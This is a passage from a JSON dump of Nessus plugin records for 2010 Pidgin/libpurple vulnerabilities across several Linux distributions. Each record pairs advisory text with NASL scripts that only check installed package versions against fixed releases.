(rpm_check(release:\"MDK2009.0\", cpu:\"i386\", reference:\"libpurple0-2.6.6-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"pidgin-2.6.6-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"pidgin-bonjour-2.6.6-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"pidgin-client-2.6.6-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"pidgin-gevolution-2.6.6-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"pidgin-i18n-2.6.6-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"pidgin-meanwhile-2.6.6-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"pidgin-mono-2.6.6-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"pidgin-perl-2.6.6-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"pidgin-plugins-2.6.6-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"pidgin-silc-2.6.6-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"pidgin-tcl-2.6.6-0.1mdv2009.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:40:43", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=565792", "https://bugzilla.redhat.com/show_bug.cgi?id=565786", "https://bugzilla.redhat.com/show_bug.cgi?id=554335", "http://www.nessus.org/u?83e02803"], "pluginID": "47252", "description": "2.6.6 with security and numerous minor bug fixes CVE-2010-0277 CVE-2010-0420 CVE-2010-0423\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 7, "reporter": "Tenable", "published": "2010-07-01T00:00:00", "title": "Fedora 12 : pidgin-2.6.6-1.fc12 (2010-1383)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0420", "CVE-2010-0013", "CVE-2010-0423", "CVE-2010-0277"], "modified": "2018-07-12T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:12", "p-cpe:/a:fedoraproject:fedora:pidgin"], "id": "FEDORA_2010-1383.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=47252", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2010-1383.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(47252);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/07/12 15:01:51\");\n\n script_cve_id(\"CVE-2010-0013\", \"CVE-2010-0277\", \"CVE-2010-0420\", \"CVE-2010-0423\");\n script_bugtraq_id(37524, 38294);\n script_xref(name:\"FEDORA\", value:\"2010-1383\");\n\n script_name(english:\"Fedora 12 : pidgin-2.6.6-1.fc12 (2010-1383)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"2.6.6 with security and numerous minor bug fixes CVE-2010-0277\nCVE-2010-0420 CVE-2010-0423\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=554335\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=565786\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=565792\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-February/035409.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?83e02803\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected pidgin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 22, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:pidgin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:12\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/07/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^12([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 12.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC12\", reference:\"pidgin-2.6.6-1.fc12\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"pidgin\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-02T00:11:38", "references": ["http://support.novell.com/security/cve/CVE-2010-0423.html", "http://support.novell.com/security/cve/CVE-2010-0277.html", "http://support.novell.com/security/cve/CVE-2010-0013.html", "http://support.novell.com/security/cve/CVE-2010-0420.html"], "pluginID": "51728", "description": "This update of pidgin fixes various security vulnerabilities :\n\n - Remote file disclosure vulnerability by using the MSN protocol. CVE-2010-0277: CVSS v2 Base Score: 4.9:\n Resource Management Errors (CWE-399) MSN protocol plugin in libpurple allowed remote attackers to cause a denial of service (memory corruption) at least. CVE-2010-0420:\n Same nick names in XMPP MUC lead to a crash in finch.\n CVE-2010-0423: A remote denial of service attack (resource consumption) is possible by sending an IM with a lot of smilies in it. (CVE-2010-0013: CVSS v2 Base Score: 4.3: Path Traversal (CWE-22))", "edition": 5, "reporter": "Tenable", "published": "2011-01-27T00:00:00", "title": "SuSE 10 Security Update : pidgin (ZYPP Patch Number 6861)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0420", "CVE-2010-0013", "CVE-2010-0423", "CVE-2010-0277"], "modified": "2016-12-22T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_FINCH-6861.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=51728", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(51728);\n script_version (\"$Revision: 1.4 $\");\n script_cvs_date(\"$Date: 2016/12/22 20:32:45 $\");\n\n script_cve_id(\"CVE-2010-0013\", \"CVE-2010-0277\", \"CVE-2010-0420\", \"CVE-2010-0423\");\n\n script_name(english:\"SuSE 10 Security Update : pidgin (ZYPP Patch Number 6861)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of pidgin fixes various security vulnerabilities :\n\n - Remote file disclosure vulnerability by using the MSN\n protocol. CVE-2010-0277: CVSS v2 Base Score: 4.9:\n Resource Management Errors (CWE-399) MSN protocol plugin\n in libpurple allowed remote attackers to cause a denial\n of service (memory corruption) at least. CVE-2010-0420:\n Same nick names in XMPP MUC lead to a crash in finch.\n CVE-2010-0423: A remote denial of service attack\n (resource consumption) is possible by sending an IM with\n a lot of smilies in it. (CVE-2010-0013: CVSS v2 Base\n Score: 4.3: Path Traversal (CWE-22))\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0013.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0277.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0420.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0423.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6861.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_cwe_id(20, 22, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"finch-2.6.6-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"libpurple-2.6.6-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"pidgin-2.6.6-0.4.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-02T00:03:37", "references": ["https://bugzilla.novell.com/show_bug.cgi?id=567799", "https://bugzilla.novell.com/show_bug.cgi?id=569616"], "pluginID": "44976", "description": "This update of pidgin fixes various security vulnerabilities\n\n - CVE-2010-0013: CVSS v2 Base Score: 4.3: Path Traversal (CWE-22) Remote file disclosure vulnerability by using the MSN protocol.\n\n - CVE-2010-0277: CVSS v2 Base Score: 4.9: Resource Management Errors (CWE-399) MSN protocol plugin in libpurple allowed remote attackers to cause a denial of service (memory corruption) at least.\n\n - CVE-2010-0420 Same nick names in XMPP MUC lead to a crash in finch.\n\n - CVE-2010-0423 A remote denial of service attack (resource consumption) is possible by sending an IM with a lot of smilies in it.", "edition": 5, "reporter": "Tenable", "published": "2010-03-04T00:00:00", "title": "openSUSE Security Update : finch (finch-2032)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0420", "CVE-2010-0013", "CVE-2010-0423", "CVE-2010-0277"], "modified": "2016-12-21T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:finch", "p-cpe:/a:novell:opensuse:finch-devel", "cpe:/o:novell:opensuse:11.0", "p-cpe:/a:novell:opensuse:libpurple-meanwhile", "p-cpe:/a:novell:opensuse:libpurple-lang", "p-cpe:/a:novell:opensuse:pidgin-devel", "p-cpe:/a:novell:opensuse:libpurple-mono", "p-cpe:/a:novell:opensuse:pidgin", "p-cpe:/a:novell:opensuse:libpurple", "p-cpe:/a:novell:opensuse:libpurple-devel"], "id": "SUSE_11_0_FINCH-100219.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=44976", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update finch-2032.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44976);\n script_version(\"$Revision: 1.6 $\");\n script_cvs_date(\"$Date: 2016/12/21 20:09:49 $\");\n\n script_cve_id(\"CVE-2010-0013\", \"CVE-2010-0277\", \"CVE-2010-0420\", \"CVE-2010-0423\");\n\n script_name(english:\"openSUSE Security Update : finch (finch-2032)\");\n script_summary(english:\"Check for the finch-2032 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of pidgin fixes various security vulnerabilities\n\n - CVE-2010-0013: CVSS v2 Base Score: 4.3: Path Traversal\n (CWE-22) Remote file disclosure vulnerability by using\n the MSN protocol.\n\n - CVE-2010-0277: CVSS v2 Base Score: 4.9: Resource\n Management Errors (CWE-399) MSN protocol plugin in\n libpurple allowed remote attackers to cause a denial of\n service (memory corruption) at least.\n\n - CVE-2010-0420 Same nick names in XMPP MUC lead to a\n crash in finch.\n\n - CVE-2010-0423 A remote denial of service attack\n (resource consumption) is possible by sending an IM with\n a lot of smilies in it.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=567799\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=569616\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected finch packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_cwe_id(20, 22, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:finch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:finch-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpurple\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpurple-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpurple-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpurple-meanwhile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpurple-mono\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pidgin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pidgin-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/03/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"finch-2.6.6-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"finch-devel-2.6.6-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"libpurple-2.6.6-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"libpurple-devel-2.6.6-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"libpurple-lang-2.6.6-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"libpurple-meanwhile-2.6.6-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"libpurple-mono-2.6.6-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"pidgin-2.6.6-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"pidgin-devel-2.6.6-0.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"pidgin\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-11-24T07:29:28", "references": ["https://usn.ubuntu.com/902-1/"], "pluginID": "44688", "description": "Fabian Yamaguchi discovered that Pidgin incorrectly validated all fields of an incoming message in the MSN protocol handler. A remote attacker could send a specially crafted message and cause Pidgin to crash, leading to a denial of service. (CVE-2010-0277)\n\nSadrul Habib Chowdhury discovered that Pidgin incorrectly handled certain nicknames in Finch group chat rooms. A remote attacker could use a specially crafted nickname and cause Pidgin to crash, leading to a denial of service. (CVE-2010-0420)\n\nAntti Hayrynen discovered that Pidgin incorrectly handled large numbers of smileys. A remote attacker could send a specially crafted message and cause Pidgin to become unresponsive, leading to a denial of service. (CVE-2010-0423).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 7, "reporter": "Tenable", "published": "2010-02-23T00:00:00", "title": "Ubuntu 8.04 LTS / 8.10 / 9.04 / 9.10 : pidgin vulnerabilities (USN-902-1)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0420", "CVE-2010-0423", "CVE-2010-0277"], "modified": "2018-11-23T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libpurple0", "p-cpe:/a:canonical:ubuntu_linux:pidgin-dev", "p-cpe:/a:canonical:ubuntu_linux:pidgin-data", "p-cpe:/a:canonical:ubuntu_linux:finch", "p-cpe:/a:canonical:ubuntu_linux:libpurple-dev", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:finch-dev", "cpe:/o:canonical:ubuntu_linux:9.10", "p-cpe:/a:canonical:ubuntu_linux:gaim", "cpe:/o:canonical:ubuntu_linux:8.10", "cpe:/o:canonical:ubuntu_linux:9.04", "p-cpe:/a:canonical:ubuntu_linux:libpurple-bin", "p-cpe:/a:canonical:ubuntu_linux:pidgin-dbg", "p-cpe:/a:canonical:ubuntu_linux:pidgin"], "id": "UBUNTU_USN-902-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=44688", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-902-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44688);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/11/23 12:49:58\");\n\n script_cve_id(\"CVE-2010-0277\", \"CVE-2010-0420\", \"CVE-2010-0423\");\n script_xref(name:\"USN\", value:\"902-1\");\n\n script_name(english:\"Ubuntu 8.04 LTS / 8.10 / 9.04 / 9.10 : pidgin vulnerabilities (USN-902-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fabian Yamaguchi discovered that Pidgin incorrectly validated all\nfields of an incoming message in the MSN protocol handler. A remote\nattacker could send a specially crafted message and cause Pidgin to\ncrash, leading to a denial of service. (CVE-2010-0277)\n\nSadrul Habib Chowdhury discovered that Pidgin incorrectly handled\ncertain nicknames in Finch group chat rooms. A remote attacker could\nuse a specially crafted nickname and cause Pidgin to crash, leading to\na denial of service. (CVE-2010-0420)\n\nAntti Hayrynen discovered that Pidgin incorrectly handled large\nnumbers of smileys. A remote attacker could send a specially crafted\nmessage and cause Pidgin to become unresponsive, leading to a denial\nof service. (CVE-2010-0423).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/902-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cwe_id(20, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:finch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:finch-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:gaim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpurple-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpurple-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpurple0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pidgin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pidgin-data\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pidgin-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pidgin-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2010-2018 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(8\\.04|8\\.10|9\\.04|9\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 8.04 / 8.10 / 9.04 / 9.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"8.04\", pkgname:\"finch\", pkgver:\"2.4.1-1ubuntu2.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"finch-dev\", pkgver:\"2.4.1-1ubuntu2.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"gaim\", pkgver:\"2.4.1-1ubuntu2.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpurple-bin\", pkgver:\"2.4.1-1ubuntu2.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpurple-dev\", pkgver:\"2.4.1-1ubuntu2.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpurple0\", pkgver:\"2.4.1-1ubuntu2.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pidgin\", pkgver:\"1:2.4.1-1ubuntu2.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pidgin-data\", pkgver:\"2.4.1-1ubuntu2.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pidgin-dbg\", pkgver:\"2.4.1-1ubuntu2.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pidgin-dev\", pkgver:\"2.4.1-1ubuntu2.9\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"finch\", pkgver:\"2.5.2-0ubuntu1.7\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"finch-dev\", pkgver:\"2.5.2-0ubuntu1.7\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpurple-bin\", pkgver:\"2.5.2-0ubuntu1.7\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpurple-dev\", pkgver:\"2.5.2-0ubuntu1.7\")) flag++;\nif 